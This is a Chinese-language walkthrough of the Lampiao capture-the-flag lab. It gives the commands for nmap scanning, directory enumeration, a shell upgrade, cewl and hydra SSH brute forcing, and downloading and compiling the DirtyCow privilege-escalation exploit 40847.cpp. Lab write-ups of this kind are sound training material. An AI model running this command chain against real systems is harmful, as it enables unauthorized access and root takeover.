Lampiao靶场-dirtycow漏洞利用
-
Lampiao靶场-dirtycow漏洞利用
- 一、主机发现
- 二、端口扫描
- 三、目录遍历
- 四、拿到webshell
- 五、实现交互式shell
- 六、暴力破解
- 七、把dirtycow脚本传到靶机
- 八、编译运行dirtycow脚本
只是简单记录一下所用工具
机器信息:
靶机:192.168.142.132
攻击机:192.168.142.133
一、主机发现
nmap -sP 192.168.142.0/24
需要自己判断一下,哪台是靶机。
二、端口扫描
nmap -A -p- 192.168.142.132
进行端口扫描,获取端口信息,发现有22、80、1898端口开放
三、目录遍历
目录遍历可以使用dirb或者dirsearch工具
dirb http://192.168.142.133:1898
或
python3 dirsearch.py -u http://192.168.142.133:1898
个人感觉dirsearch比较速度更快
四、拿到webshell
这里就不写了,网上太多了。
五、实现交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
其他方式参考大佬的文章,发现好东西就分享,我就不复制粘贴了。
https://saucer-man.com/information_security/233.html
六、暴力破解
因为有22端口,存在爆破的可能性,先收集一下网站信息做一个字典
cewl http://192.168.142.133:1898 -w lampiao.txt
用hydra进行ssh的暴力破解
hydra -l tiago -P lampiao.txt 192.168.142.133 ssh
补充:
-l后面加用户名,拿到交互式shell后可以查询一下/etc/passwd文件,自然可以拿到用户名。前期是拿不到其他用户名的,发现22端口开放也只能爆破root。
如果直接爆破root成功,恭喜你游戏结束。
七、把dirtycow脚本传到靶机
1、用python开启http服务
在攻击机上用python开启一个端口为3333的http服务
python -m http.server 3333
靶机用wget下载dirtycow脚本,当然有一些细节,需要自己去思考。
wget http://192.168.142.133:3333/40847.cpp
2、ssh服务传输文件
参考资料:
https://zhuanlan.zhihu.com/p/507876254
攻击机上运行:
rsync 40847.cpp tiago@192.168.142.132:/home/tiago
或者
靶机上运行:
rsync root@192.168.142.132:/root/桌面/40847.cpp .(.是代表当前路径)
八、编译运行dirtycow脚本
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
- -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
- -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
- -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
- -std=c++11就是用按C++2011标准来编译的
- -pthread 在Linux中要用到多线程时,需要链接pthread库
- -o dcow gcc生成的目标文件,名字为dcow
参考资料:
https://blog.csdn.net/weixin_43715506/article/details/113410027文章来源:https://www.toymoban.com/news/detail-410671.html
https://blog.csdn.net/qq_42967398/article/details/102536576文章来源地址https://www.toymoban.com/news/detail-410671.html
到了这里,关于Lampiao靶场-dirtycow漏洞利用的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!